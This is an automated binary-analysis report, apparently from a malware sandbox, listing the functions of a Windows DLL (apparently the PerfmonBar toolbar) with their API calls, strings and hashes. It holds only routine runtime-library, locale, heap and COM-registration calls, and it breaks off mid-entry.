Part of subcall function 6EA07ED0: VariantClear.OLEAUT32(?), ref: 6EA0806B
Part of subcall function 6EA07ED0: _com_issue_error.COMSUPP ref: 6EA08096
Part of subcall function 6EA07ED0: _com_issue_error.COMSUPP ref: 6EA080A0
Part of subcall function 6EA07ED0: _com_issue_error.COMSUPP ref: 6EA080A6
Part of subcall function 6EA07ED0: _com_issue_error.COMSUPP ref: 6EA080B0
Part of subcall function 6EA07ED0: _com_issue_error.COMSUPP ref: 6EA080BA

SysFreeString.OLEAUT32(00000000), ref: 6EA09B1F
MultiByteToWideChar.KERNEL32(00000003,00000000,display,000000FF,00000000,00000000,?,00000000,065D8F34,76AFD5B0), ref: 6EA09BA4
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6EA09BAE
MultiByteToWideChar.KERNEL32(00000003,00000000,display,000000FF,00000000,00000000,?,00000000,065D8F34,76AFD5B0), ref: 6EA09BCB
VarBstrCmp.OLEAUT32(00000000,00000000,00000400,00000000), ref: 6EA09BE0
SysFreeString.OLEAUT32(00000000), ref: 6EA09BEF
SysFreeString.OLEAUT32(00000000), ref: 6EA09DF7
SysFreeString.OLEAUT32(00000000), ref: 6EA09E3B
_com_issue_error.COMSUPP ref: 6EA09E7D
_com_issue_error.COMSUPP ref: 6EA09E83
_com_issue_error.COMSUPP ref: 6EA09E8D
SysFreeString.OLEAUT32(76AFD5B0), ref: 6EA09E98

Strings

display, xrefs: 6EA09B9B, 6EA09BC2
fontFamily, xrefs: 6EA09539
&, xrefs: 6EA09E46
fontBold, xrefs: 6EA0965D
true, xrefs: 6EA096F3, 6EA09808
fontSize, xrefs: 6EA09996
%lX, xrefs: 6EA09927
fontColor, xrefs: 6EA09887
fontItalic, xrefs: 6EA09772

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$_com_issue_error$Variant$Alloc$ByteCharClearInitMultiWide$BstrChangeCopyType
String ID: %lX$&$display$fontBold$fontColor$fontFamily$fontItalic$fontSize$true
API String ID: 31926906-3443811302
Opcode ID: bfdb23efde8c4760299f1776f8505da78e86fa908eeacef9d55e87135d81326a
Instruction ID: fcae1e6b214f4a13be7b08afddc0a93bfb50192de182b9890d58d601f0b402bf
Opcode Fuzzy Hash: bfdb23efde8c4760299f1776f8505da78e86fa908eeacef9d55e87135d81326a
Instruction Fuzzy Hash: B262F370A013169FEB50CFE4DE54BDEB7B8AF85308F144558E819AB280DB70DD85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA0E6B0, Relevance: 39.0, APIs: 19, Strings: 3, Instructions: 451stringmemoryCOMMON

Download Yara Rule

APIs

CoTaskMemAlloc.OLE32(6EA0DE78,065D8F34,00000000,00000000), ref: 6EA0E748
CoTaskMemFree.OLE32(00000000,065D8F34,00000000,00000000), ref: 6EA0E774
CharNextW.USER32(?,00000000), ref: 6EA0E7D9
CharNextW.USER32(00000000), ref: 6EA0E7DE
CharNextW.USER32(00000000), ref: 6EA0E7E3
CharNextW.USER32(00000000), ref: 6EA0E7E8
CharNextW.USER32(?), ref: 6EA0E830
CharNextW.USER32 ref: 6EA0E840
CharNextW.USER32(00000000,065D8F34,00000000,00000000), ref: 6EA0E8BA
CharNextW.USER32 ref: 6EA0E8E3
CharNextW.USER32(00000000), ref: 6EA0E917
CoTaskMemFree.OLE32(00000000), ref: 6EA0E92D
lstrcmpiW.KERNEL32(?,?), ref: 6EA0E97C
CharNextW.USER32 ref: 6EA0EA02
CoTaskMemFree.OLE32(00000000), ref: 6EA0EA33
CoTaskMemFree.OLE32(00000000,065D8F34,00000000,00000000), ref: 6EA0EA51
lstrcmpiW.KERNEL32(?,6EA45C7C,?,00000000,C000008C,00000000,00000000), ref: 6EA0EB0D
CoTaskMemFree.OLE32(00000000,C000008C,00000000,00000000), ref: 6EA0EB2C
CharNextW.USER32(?,?,00000000,00000000,00000000,?), ref: 6EA0EBF1

Strings

}}, xrefs: 6EA0E88C
HKCR, xrefs: 6EA0E7C0
HKCU{Software{Classes, xrefs: 6EA0E7F5

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Task$Free$lstrcmpi$Alloc
String ID: }}$HKCR$HKCU{Software{Classes
API String ID: 2337762536-1142484189
Opcode ID: a78f84e754ea6fcc824563c424e19d28d818e180a720efaa99cd0384bc346470
Instruction ID: d8e12e5413d0b08c3994a6189204d4585ae382fb7aa817ba6b215de5a0b23203
Opcode Fuzzy Hash: a78f84e754ea6fcc824563c424e19d28d818e180a720efaa99cd0384bc346470
Instruction Fuzzy Hash: BAF1C131904319CFDF61DFE8D894B9EBBB9AF46708F1484A9E805EB284D7309C85DB54

Uniqueness

Uniqueness Score: -1.00%

Function 6EA34610, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

Part of subcall function 6EA2897C: GetLastError.KERNEL32(00000000,00000000,00000004,6EA1B7B1,00000000,00000000,00000000,?,6EA2D694,00000000,00000000,?,00F03A88,00000000), ref: 6EA28981
Part of subcall function 6EA2897C: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6EA2D694,00000000,00000000,?,00F03A88,00000000), ref: 6EA28A1F

GetACP.KERNEL32(00000055,?,?,?,?,?,6EA29DCB,?,?,?,?,?,?,00000004), ref: 6EA346D1
IsValidCodePage.KERNEL32(00000000,00000055,?,?,?,?,?,6EA29DCB,?,?,?,?,?,?,00000004), ref: 6EA346FC
_wcschr.LIBVCRUNTIME ref: 6EA34790
_wcschr.LIBVCRUNTIME ref: 6EA3479E
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,6EA29DCB,00000000,6EA29EEB), ref: 6EA34861

Strings

utf8, xrefs: 6EA347CE

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: e4ccd518092fe3282b534607a436913ae634093d2f9d6e0a05dde68959c8074d
Instruction ID: a17c51213fd6c82d3f2a5fa44b5369407fc0c806698763bb7321877fa7ddae65
Opcode Fuzzy Hash: e4ccd518092fe3282b534607a436913ae634093d2f9d6e0a05dde68959c8074d
Instruction Fuzzy Hash: D7710571604726AAE7149FB5CD40BE677BCEF45304F34486AE915EB180EB72DCC28768

Uniqueness

Uniqueness Score: -1.00%

Function 6EA31F65, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1343COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 6EA320E0

Strings

1#SNAN, xrefs: 6EA33289
1#IND, xrefs: 6EA33282
1#QNAN, xrefs: 6EA33290
1#INF, xrefs: 6EA332AD

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: ba54f9ba9b1e81c7c64fb47f8f02a0132df6299d8e8989bfdf115588ca9df7dd
Instruction ID: ce920b428b7a2d1588d073d9bddf5c5f500ca65fea087b2871cf708cfdab2412
Opcode Fuzzy Hash: ba54f9ba9b1e81c7c64fb47f8f02a0132df6299d8e8989bfdf115588ca9df7dd
Instruction Fuzzy Hash: 6EC24771E086298FDB64CEA8DD407D9B3B9EB49304F2441EAD84DE7240E774AEC58F94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA12C70, Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 404COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(6EA00000,?,00000104), ref: 6EA12E5C
GetModuleHandleW.KERNEL32(00000000), ref: 6EA130C6

Part of subcall function 6EA07B50: RaiseException.KERNEL32(?,?,00000000,00000000), ref: 6EA07B5D

Strings

Module_Raw, xrefs: 6EA131A0
REGISTRY, xrefs: 6EA131F2
Module, xrefs: 6EA13171

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Module$ExceptionFileHandleNameRaise
String ID: Module$Module_Raw$REGISTRY
API String ID: 1728487212-549000027
Opcode ID: 339ad531ca0c4f9859c5d6797ba59095e976902492e2b58d7b6f2fb22b48400a
Instruction ID: a2ae53ac97d6c8f9c0c0a7d50eb1ac76f4c63a5df90a8b3f36dfff8c4eff4900
Opcode Fuzzy Hash: 339ad531ca0c4f9859c5d6797ba59095e976902492e2b58d7b6f2fb22b48400a
Instruction Fuzzy Hash: BAE1B075A082258BDB649F94DD54BDA73B8AF46308F0504ACD80EA7640EB74EEC4CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA17334, Relevance: 9.0, APIs: 6, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000C,6EA17250,00000000,?,6EA173E8,00000000), ref: 6EA17336
GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000), ref: 6EA1735D
HeapAlloc.KERNEL32(00000000), ref: 6EA17364
InitializeSListHead.KERNEL32(00000000), ref: 6EA17371
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6EA17386
HeapFree.KERNEL32(00000000), ref: 6EA1738D

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
String ID:
API String ID: 1475849761-0
Opcode ID: 0e6e3127b331b820b04241d54fcd5bfee470b97e65d3b13a49047959b72b0a04
Instruction ID: c231b0eb25070f2947389bcb5d2586354b082a208a8cfbc6c77e26ec41eb3f5b
Opcode Fuzzy Hash: 0e6e3127b331b820b04241d54fcd5bfee470b97e65d3b13a49047959b72b0a04
Instruction Fuzzy Hash: BAF04F75214B119BDF619FB9CC0CB5637AABB87712F159828F98AEB280DB35C4428A50

Uniqueness

Uniqueness Score: -1.00%

Function 6EA34DA4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(51CEB70F,2000000B,00000000,00000002,00000000,?,?,?,6EA350CA,?,00000000), ref: 6EA34E3D
GetLocaleInfoW.KERNEL32(51CEB70F,20001004,00000000,00000002,00000000,?,?,?,6EA350CA,?,00000000), ref: 6EA34E66
GetACP.KERNEL32(?,?,6EA350CA,?,00000000), ref: 6EA34E7B

Strings

ACP, xrefs: 6EA34DC2
OCP, xrefs: 6EA34DF8

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 0369fd9a116b41f93722edae9f1c3b520ac8a4f87435faf28b32e1a53129eb61
Instruction ID: a0ceb0dd89e537e52ffe8540ab33c20e33bec329d54cdd13d5fb3f0f7122e6ad
Opcode Fuzzy Hash: 0369fd9a116b41f93722edae9f1c3b520ac8a4f87435faf28b32e1a53129eb61
Instruction Fuzzy Hash: 4421D636A14121AADB648FE5D800AC773BBAF41F51B3A8566E919DB108E733DDC3C358

Uniqueness

Uniqueness Score: -1.00%

Function 6EA34F7F, Relevance: 7.7, APIs: 5, Instructions: 184COMMON

Download Yara Rule

APIs

Part of subcall function 6EA2897C: GetLastError.KERNEL32(00000000,00000000,00000004,6EA1B7B1,00000000,00000000,00000000,?,6EA2D694,00000000,00000000,?,00F03A88,00000000), ref: 6EA28981
Part of subcall function 6EA2897C: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6EA2D694,00000000,00000000,?,00F03A88,00000000), ref: 6EA28A1F

Part of subcall function 6EA2897C: _free.LIBCMT ref: 6EA289DE
Part of subcall function 6EA2897C: _free.LIBCMT ref: 6EA28A14

GetUserDefaultLCID.KERNEL32(00000055,?,?), ref: 6EA3508B
IsValidCodePage.KERNEL32(00000000), ref: 6EA350D6
IsValidLocale.KERNEL32(?,00000001), ref: 6EA350E5
GetLocaleInfoW.KERNEL32(?,00001001,6EA29DC4,00000040,?,6EA29EE4,00000055,00000000,?,?,00000055,00000000), ref: 6EA3512D
GetLocaleInfoW.KERNEL32(?,00001002,6EA29E44,00000040), ref: 6EA3514C

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: 36a0ab39bbae56f84e8031be5ff54464caea310659e81864753d6249badf7e5a
Instruction ID: 1f8bcc56cc4511423df52e27a1399ea97c56720ffb7c5cd835d0abfca729a91f
Opcode Fuzzy Hash: 36a0ab39bbae56f84e8031be5ff54464caea310659e81864753d6249badf7e5a
Instruction Fuzzy Hash: F6519371900626AFEF50DFE9CC40AEA77B8FF06700F294425A914EB150D7729D858BA5

Uniqueness

Uniqueness Score: -1.00%

Function 6EA14E67, Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6EA14E73
IsDebuggerPresent.KERNEL32 ref: 6EA14F3F
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6EA14F5F
UnhandledExceptionFilter.KERNEL32(?), ref: 6EA14F69

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: dbd52772d5da3308a9b1c751ea555dae5708e0ff64cd1037c769f5c25f00f7b3
Instruction ID: 795a1a2353b9250367c2758d5e15b8bfb5073a1f3fbe3a881dc0c31214fbf653
Opcode Fuzzy Hash: dbd52772d5da3308a9b1c751ea555dae5708e0ff64cd1037c769f5c25f00f7b3
Instruction Fuzzy Hash: 65313875D093289BDF20DFA4C9897CDBBF8BF08309F1040AAE54CAB240EB715A858F44

Uniqueness

Uniqueness Score: -1.00%

Function 6EA1461A, Relevance: 6.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,6EA1473A,6EA3A3AC), ref: 6EA1461F
UnhandledExceptionFilter.KERNEL32(6EA1473A,?,6EA1473A,6EA3A3AC), ref: 6EA14628
GetCurrentProcess.KERNEL32(C0000409,?,6EA1473A,6EA3A3AC), ref: 6EA14633
TerminateProcess.KERNEL32(00000000,?,6EA1473A,6EA3A3AC), ref: 6EA1463A

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 407ac3ee9adcd7266011fc0bcb9134787fdb7d4ca09595291d306fb0d9f67859
Instruction ID: 85ad3a65a3b58a0a00f74369aa68a539817472694ac58e7dadf590ced55ea72d
Opcode Fuzzy Hash: 407ac3ee9adcd7266011fc0bcb9134787fdb7d4ca09595291d306fb0d9f67859
Instruction Fuzzy Hash: B8D0CA32000B28AFDF202BE0CC0CA183A2AEB0B206F04C810F70AEA012CA3144028BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6EA0AF10, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

\PerfmonBar\config.xml, xrefs: 6EA0ADB9

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: \PerfmonBar\config.xml
API String ID: 0-3729978544
Opcode ID: 41270ab128269798f1f166527c02124ab816e59e31ddf82660710ef642ba5fe1
Instruction ID: 9355a1c46bcdb6e8f88a79ad9d934a4bc9a90d60c56e4803596b0a7dc43cc22d
Opcode Fuzzy Hash: 41270ab128269798f1f166527c02124ab816e59e31ddf82660710ef642ba5fe1
Instruction Fuzzy Hash: 833178B1E006589FDB10CFA8C944B9EBBF8FB08714F144269E815AB380DB35A945CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA34A27, Relevance: 4.7, APIs: 3, Instructions: 206COMMON

Download Yara Rule

APIs

Part of subcall function 6EA2897C: GetLastError.KERNEL32(00000000,00000000,00000004,6EA1B7B1,00000000,00000000,00000000,?,6EA2D694,00000000,00000000,?,00F03A88,00000000), ref: 6EA28981
Part of subcall function 6EA2897C: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6EA2D694,00000000,00000000,?,00F03A88,00000000), ref: 6EA28A1F

Part of subcall function 6EA2897C: _free.LIBCMT ref: 6EA289DE
Part of subcall function 6EA2897C: _free.LIBCMT ref: 6EA28A14

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6EA34A7B
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6EA34AC5
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6EA34B8B

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale$ErrorLast_free
String ID:
API String ID: 3140898709-0
Opcode ID: e68024e0bb32aa06a8a157a4faa29e6dc2188d8b09ce3d599b155782efa5ec9a
Instruction ID: 8d9a379229bc6e6100910bc51b913b257f195cf63cce1cd32cb613b0cf515a94
Opcode Fuzzy Hash: e68024e0bb32aa06a8a157a4faa29e6dc2188d8b09ce3d599b155782efa5ec9a
Instruction Fuzzy Hash: 9C61E2715142279FEB548F68CD81BAAB7A8FF04300F2481B9E925C7284E736DDD6CB58

Uniqueness

Uniqueness Score: -1.00%

Function 6EA1D436, Relevance: 4.6, APIs: 3, Instructions: 78COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6EA1D52E
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6EA1D538
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6EA1D545

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 9820f92e3dc4a72a5fefd267eeb02f7ddac0d4f944506a538f841ba75773c57b
Instruction ID: a73e52430c4941d5f0a354c6dcc3cd5f32757c7bdac025d252b336bf5d403f22
Opcode Fuzzy Hash: 9820f92e3dc4a72a5fefd267eeb02f7ddac0d4f944506a538f841ba75773c57b
Instruction Fuzzy Hash: 8731C474905228ABCB21DF68D9887C9BBB8BF08315F5085DAE41CAB250EB309F858F44

Uniqueness

Uniqueness Score: -1.00%

Function 6EA24F94, Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,6EA24F93,?,00000000,?,?,?,6EA2D694), ref: 6EA24FB6
TerminateProcess.KERNEL32(00000000,?,6EA24F93,?,00000000,?,?,?,6EA2D694), ref: 6EA24FBD
ExitProcess.KERNEL32 ref: 6EA24FCF

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 77a332b2cd29d615070a6d50afb95c162a9ca487ab2c51f26897105ff7479bbb
Instruction ID: 637c0095f071d897d882aeef568e4f1bd1489a511dfed7da5734d4a3423d71f6
Opcode Fuzzy Hash: 77a332b2cd29d615070a6d50afb95c162a9ca487ab2c51f26897105ff7479bbb
Instruction Fuzzy Hash: B3E08C31418608AFCF216F90CD1CE483B7AFB46686F098824F805EA135CB75DD83DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA21D50, Relevance: 3.5, APIs: 2, Instructions: 452COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ba0e1c49d5750213d23d050c5c371eddc3c8fdc116524fea955f20c603a5bed
Instruction ID: 53e07ef7cda0ae378df12233e7b5f443dcc9ac401f523705f60a777365f99d02
Opcode Fuzzy Hash: 1ba0e1c49d5750213d23d050c5c371eddc3c8fdc116524fea955f20c603a5bed
Instruction Fuzzy Hash: FA026D71E102199FDB14CFA8C990AAEB7F1FF88314F298269E918BB344D7319D41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA02B50, Relevance: 2.9, Strings: 2, Instructions: 444COMMON

Download Yara Rule

Strings

+, xrefs: 6EA02F96
%, xrefs: 6EA02FA6

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: %$+
API String ID: 0-2626897407
Opcode ID: 2f08ac72e98657afe876e318c4d80b272dfebd0b04aee51d959cda25f8b0b082
Instruction ID: 961f1423754f284e0bb8e09a462b86379875c09718cff286c2c5e4f72ac344ef
Opcode Fuzzy Hash: 2f08ac72e98657afe876e318c4d80b272dfebd0b04aee51d959cda25f8b0b082
Instruction Fuzzy Hash: 5AF10171D106199FDB14CFA8EC40BDEBBB9FF89308F144629F815AB241D734A981CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6EA1744C, Relevance: 2.5, APIs: 2, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,00000000,?,6EA1204A,?,?,00000000,?,?,C000008C), ref: 6EA17490
HeapFree.KERNEL32(00000000,?,6EA1204A,?,?,00000000,?,?,C000008C), ref: 6EA17497

Part of subcall function 6EA17304: GetProcessHeap.KERNEL32(00000000,?,?,6EA1746A,00000000,00000000,?,6EA1204A,?,?,00000000,?,?,C000008C), ref: 6EA1731C
Part of subcall function 6EA17304: HeapFree.KERNEL32(00000000,?,6EA1746A,00000000,00000000,?,6EA1204A,?,?,00000000,?,?,C000008C), ref: 6EA17323

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 4a05a22c158f1c670f93fd8bfb29ee3b060295b8c5d3959e0b49d53cd3087ea4
Instruction ID: 8a3108b202ea526472884983947afd6bb0eddb4e97bcfbe7829f75cfceb33221
Opcode Fuzzy Hash: 4a05a22c158f1c670f93fd8bfb29ee3b060295b8c5d3959e0b49d53cd3087ea4
Instruction Fuzzy Hash: 4EF02E31109B259BCF212BD4DC08FDB3F59EF83B21F049419F494565D08B3188C1CE58

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2AE28, Relevance: 1.8, APIs: 1, Instructions: 274COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6EA2AE23,?,?,00000008,?,?,6EA365EA,00000000), ref: 6EA2B055

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 2f8bd2b0cb01642fb1ed5d70814cb2f3a0491a9ab557b55fd267cee028c523b7
Instruction ID: 2d0a88e55cad374fa0d36272eb5dd2ab1914d6857dfcac7482c6b79a811fa87c
